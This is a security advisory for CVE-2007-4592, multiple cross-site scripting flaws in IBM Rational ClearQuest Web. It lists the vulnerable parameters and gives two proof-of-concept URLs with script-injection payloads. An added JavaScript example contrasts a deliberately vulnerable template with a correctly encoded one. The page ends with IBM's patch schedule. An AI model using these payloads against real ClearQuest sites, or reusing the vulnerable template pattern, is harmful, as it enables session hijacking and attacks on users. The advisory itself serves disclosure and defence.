Details : SecurityAlert

  Topic : IBM Rational ClearQuest Web Multiple XSS Vulnerabilities
  SecurityAlert : 3753
  CVE : CVE-2007-4592
  SecurityRisk : Low
  Remote Exploit : Yes
  Local Exploit : No
  Exploit Given : Yes
  Credit : sasquatch
  Published : 20.03.2008

  Affected Software : IBM Rational ClearQuest Web



  Advisory Text :  

IBM Rational ClearQuest Web Multiple XSS

CVE-2007-4592

Discovered on 07-24-07 by sasquatch of SecureState - www.securestate.com

Multiple cross site scripting vulnerabilities exist within IBM's Rational
ClearQuest Web interface.

VULNERABLE VARIABLES:
=====================

contextid (query string parameter)

schema (query string parameter)

userNameVal ("User Name" text box)

POC URL:
http://www.website.com/cqweb/login?/cqweb/main?command=GenerateMainFrame&service=CQ&schema=SCHEMAHERE"; alert('XSS');//&contextid=DATABASECONTEXTHERE"; alert('XSS');//

VULNERABLE VARIABLE:
====================

username (query string parameter)

POC URL:
http://www.website.com/cqweb/login?targetUrl=/cqweb/main?command=GenerateMainFrame&ratl_userdb=DBHERE,&test=&clientServerAddress=http://www.website.com/cqweb/login&username=test</script><script>alert('xss')</script>&password=test&schema=SCHEMAHERE&userDb=DBHERE
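The two PoC URLs above land attacker input in two slightly different spots of an inline script: the schema/contextid payload closes a double-quoted JavaScript string literal (`";alert('XSS');//`), while the username payload does not bother with JavaScript syntax at all and simply ends the script element with `</script>`, which the HTML tokenizer honours no matter how the script's strings are quoted. The block below is an added example, not code from the advisory, from SecureState or from IBM. The "vulnerable" template is an assumption about the shape of the bug (ClearQuest Web's real page template is not on this page); the point is to show both payloads going through a concatenating template and through a correctly encoded one, with a small stand-in for a browser deciding what would actually execute.

```javascript
// Added example, not code from the advisory or from IBM. Models the two
// reflection contexts the PoC URLs exercise and a correct encoder for them.

// Payload shapes taken from the two PoC URLs above.
const PAYLOAD_STRING_BREAKOUT = '";alert(\'XSS\');//';
const PAYLOAD_SCRIPT_BREAKOUT = "</script><script>alert('xss')</script>";

// ASSUMED vulnerable pattern: request parameters concatenated straight into
// JavaScript string literals inside an inline <script> block.
function renderVulnerable(params) {
  return '<script>\n' +
    'var schema = "' + params.schema + '";\n' +
    'var contextid = "' + params.contextid + '";\n' +
    'var userNameVal = "' + params.username + '";\n' +
    '</script>';
}

// Encoder for the "inside a JS string literal inside <script>" context.
// JSON.stringify escapes quotes, backslashes and control characters; the
// extra replacements cover what the HTML parser cares about, because the
// tokenizer ends a script element at the first "</script" it sees regardless
// of JavaScript quoting. U+2028/U+2029 are escaped because older engines
// treat them as line terminators inside a literal.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

function renderHardened(params) {
  return '<script>\n' +
    'var schema = ' + jsStringLiteral(params.schema) + ';\n' +
    'var contextid = ' + jsStringLiteral(params.contextid) + ';\n' +
    'var userNameVal = ' + jsStringLiteral(params.username) + ';\n' +
    '</script>';
}

// Minimal stand-in for a browser: split the page into <script> elements the
// way the HTML tokenizer does (at the first "</script>", ignoring JS syntax),
// then run each element with a fake alert(). An element that fails to parse
// is skipped, as a browser would do. Only feed this locally generated markup;
// it executes whatever script it is given.
function simulateBrowser(html) {
  const alerts = [];
  const syntaxErrors = [];
  const vars = {};
  const re = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = re.exec(html)) !== null) {
    const code = m[1];
    try {
      const run = new Function('alert', code +
        '\n;return (typeof schema === "undefined") ? null : { schema, contextid, userNameVal };');
      const out = run((msg) => alerts.push(String(msg)));
      if (out) Object.assign(vars, out);
    } catch (e) {
      if (e instanceof SyntaxError) syntaxErrors.push(e.message);
      else throw e;
    }
  }
  return { alerts, syntaxErrors, vars };
}

// Walk both payloads through both renderers. Parameter values are constructed
// from the placeholder names used in the PoC URLs.
function compare() {
  const cases = {
    stringBreakout: {
      schema: 'SCHEMAHERE' + PAYLOAD_STRING_BREAKOUT,
      contextid: 'DATABASECONTEXTHERE' + PAYLOAD_STRING_BREAKOUT,
      username: 'test',
    },
    scriptBreakout: {
      schema: 'SCHEMAHERE',
      contextid: 'DBHERE',
      username: 'test' + PAYLOAD_SCRIPT_BREAKOUT,
    },
  };
  const results = {};
  for (const [name, params] of Object.entries(cases)) {
    results[name] = {
      vulnerable: simulateBrowser(renderVulnerable(params)),
      hardened: simulateBrowser(renderHardened(params)),
    };
  }
  return results;
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(compare(), null, 2));
}
```

Running `compare()` shows the asymmetry between the two payloads: against the concatenating template the string-breakout payload fires `alert('XSS')` twice from one syntactically valid script, whereas the `</script>` payload leaves the first script element unparseable (a syntax error the browser swallows) and executes from a second element the attacker created. The encoded template keeps both values as inert strings, which is why HTML-entity encoding alone is the wrong fix here: the value sits in a JavaScript string context, and the encoder must satisfy the JS grammar and the HTML tokenizer at the same time.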

VENDOR RESPONSE:
================

Test fixes are now available from IBM Rational Support for versions
2003.06.16 Patch 2007C, 7.0.0.1_iFix04, and 7.0.1.0_iFix01.

These are the latest available patch releases before December 19, 2007.

Test fixes will be made available from IBM Rational Support some time in
January 2008 for versions 2003.06.16 Patch 2007D, 7.0.0.2, and 7.0.1.1.

These patch releases became available on December 19, 2007 but there was no
time to fix this vulnerability in these releases.

For this reason, we will provide test fixes that do fix it some time in the
middle or latter half of January 2008.

The following patch releases will fix this vulnerability: 2003.06.16 Patch
2008A, 7.0.0.2_iFix01, and 7.0.1.1_iFix01.

These patch releases were made available on March 4th, 2008.

Test fixes are only available by calling IBM Rational Support, which then
provides them to customers.

Patch releases are available via download. Please contact IBM Rational
Support for detailed information.




